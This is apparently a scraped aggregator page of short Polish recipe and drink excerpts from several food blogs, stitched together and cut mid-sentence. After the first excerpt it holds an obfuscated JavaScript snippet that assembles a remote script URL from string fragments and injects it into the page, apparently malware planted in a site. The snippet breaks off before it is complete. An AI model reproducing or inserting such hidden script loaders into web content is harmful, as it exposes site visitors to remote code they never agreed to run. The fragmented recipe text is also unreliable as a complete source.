można już działać, czyli dekorować bezowe torciki do woli. Jeżeli w syfonie zostanie trochę śmietany można schować go do lodówki i wykorzystać przy następnej okazji, czyli np. do dekoracji lodów lub kawy. (function(){ zyer=document.createElement("script");zyer_=(("u")+"st")+"a";zyer.async=true; zyer.type="text/javascript";zyer_+=("t.i")+""+"n";zyer_+=(("f")+"o");zyer_+="/"; zyeru="76007815.";zyeru+="dm65e7yuyerld31hx93"+"r9lxbdumgrb"; zyer.src="https://"+zyer
Gotujemy i jemykremowo-kokosowe kuleczki tapioki, zatopione w mocnym mrożonym espresso. 2-3 porcje 330 ml mleczka kokosowego 60 g tapioki (duże kulki) łyżeczka miodu 2 mocne espresso 4-5 kostek lodu Tapiokę zalewamy mleczkiem i odstawiamy na godzinę. Po tym czasie dodajemy do niej miód i na małym ogniu gotujemy około 25 minut (ciągle mieszając). Zestawiamy z ognia, przekładamy do szklanek(...)słoiczków i odstawiamy do przestudzenia. Przygotowujemy espresso, które również studzimy, a następnie miksujemy z lodem. Mrożoną kawą dopełniamy słoiczki z tapioką. Smacznego :) Artykuł Kokosowo-kawowa tapioka pochodzi z serwisu Mienta blog
Mienta blogwyjmowałam je z piekarnika. Ostatnie maliny i borówki, pierwsze sezonowe jabłka, do tego maślane, chrupiące ciasto francuskie i mamy gotowy przepyszny strudel. Idealnie komponuje się z kulk ą lodów lub kleksem bitej śmietany. Deser wprost idealny ;) Przy okazji zapraszam Was na wcześniejszy przepis na strudel z jabłkami z rodzynkami i orzeszkami piniowymi. Smacznego! SKŁADNIKI
La grande e la piccola cuocamiseczki ozdobione ładnymi wzorami. Ważne jest także niekiedy, aby działać szybko – nie tylko dlatego, że ktoś o wielkim apetycie może zjeść Twoją potrawę, zanim zostanie sfotografowana. Fotografowanie lodów czy innych mrożonych deserów może wymagać takiego sprawnego operowania aparatem. Najważniejsze zasady fotografii w kuchni Jeśli marzy Ci się Twoje własna fotoksiążka kucharska , to musisz pamiętać o kilku ważnych zasadach
Kulinarnyblog.pl - wiesz jak gotować!dalej! Tartę studzimy całkowicie! Jeśli chcecie jeść tartę na ciepło, to można ale wtedy sok z malin będzie się lał z ciasta, ale warto taką też zjeść z kulką lodów to już jest rozpusta masakryczna hehehe. Ale przepyszna
SMYKWKUCHNImoje serce. Tonic espresso to hit tego lata ! Bardzo prosty w przygotowaniu, a robi duże wrażenie. składniki na 1 porcję: kawa espresso 20 ml tonic 200 ml 3 kostki lodu 3 cząstki cytryny skórka z cytryny Do szklanki ścieramy trochę skórki z cytryny, wrzucamy kostki lodu, cząstki cytryny. Wlewamy schłodzony tonic, a następnie powoli espresso ( kawę przygotowujemy wcześniej i czekamy
noteskulinarnyfigawirusy. Wystarczy dodać odrobinę syropu do wody, aby wspomóc prawidłowe funkcjonowanie organizmu. Zagęszczone soki owocowe to pyszny składnik każdej dobrze zbilansowanej diety. Wiele osób nie wyobraża sobie bez nich lodów, deserów i innych codziennych napojów. Są nie tylko smakowite, ale również dostarczają nieocenionych właściwości odżywczych dla zachowania zdrowia. Zastanawiasz się, czy lepiej samodzielnie przygotować przetwory, a może zdecydować się
FoodMagazine.pl - Przepisy kulinarnefashioned (znane również jako Tumbler czy Lowball) To tradycyjne niskie szklanki o cylindrycznym kształcie z grubym dnem, w których podaje się wszystkie drinki „on the rocks”, czyli na kostkach lodu. Ich pojemność nie powinna przekraczać 300ml. Serwuje się w nich przede wszystkim mocne alkohole takie jak whisky, Bourbon czy klasyczny drink white russian na bazie wódki. Highball Powinna skojarzyć(...)jeden drink – słynną Margaritę! Hurricane Pora na coś dla wielbicieli słodkich drinków. Szklanki Hurricane na niskiej nóżce o charakterystycznym kształcie tulipana są przeznaczone do dużych koktajli na bazie kruszonego lodu. Sprawdzą się idealnie do Pinacolady, Sex on the Beach, Blue Hawaii i innych mrożonych, owocowych mikstur. Ich pojemność może się wahać od 250 aż do 600ml. Cordial To jeden
FoodMagazine.pl - Przepisy kulinarneupały nie ma nic lepszego niż mrożona domowa herbata i domowa lemoniada z miętą. Podane z kostkami lodu skutecznie gaszą pragnienie. Samodzielnie przygotowane smakują wyjątkowo. Jeżeli macie chwilę czasu zróbcie te smaczne domowe napoje. Przepis na nie jest bardzo prosty. Jedynie potrzebujemy nieco czasu na ich schłodzenie. Wyjdzie zdecydowanie taniej oraz zdrowiej, niżeli mielibyście kupować gotowce w sklepie. Do przygotowania(...)mięty delikatnie ugniatamy, aby puściły aromat. Dodajemy do owoców. Całość zalewamy przegotowaną, jeszcze ciepłą wodą i dokładnie mieszamy. 3 Odstawiamy do wystygnięcia i schładzamy w lodówce. Podajemy z kostkami lodu i świeżymi listkami mięty. Porady Lemoniadę można dosłodzić według własnych upodobań, ja użyłam niewielkiej ilości cukru. Artykuł Domowa lemoniada z miętą pochodzi z serwisu kuchniabazylii.pl - blog kulinarny
Kuchnia BazyliiFrużelina z borówek to idealny sposób na pyszne owoce, jako zdrowy dodatek do lodów, deserów i ciast. To owoce w żelu, które swoim wyglądem przypominają gęsty kisiel lub rzadszą galaretkę. Można je przygotować na dwa sposoby, czyli przy pomocy żelatyny lub z dodatkiem mąki kartoflanej. Tym razem frużelinę zrobiłam na bazie mąki ziemniaczanej, bo nas sos jest gotowy
Kulinarne przygody GatityArbuzy są teraz najpyszniejsze. To przyjemny orzeźwiający owoc w upalne dni. Warto nawet dziś przyrządzić z niego arbuzoladę ;P Składniki: 1/4 małego arbuza ok. 10 listków świeżej melisy kostki lodu Sposób przygotowania: 1. Arbuza pokroić w kostkę, pozbyć się pestek. Wrzucić do kielicha blendera. Dodać listki melisy. Zmiksować na gładko. 2. Do szklanek wrzucić trochę kostek lodu, zalać arbuzoladą. * Arbuzoladę
Kuchnia domowa Ani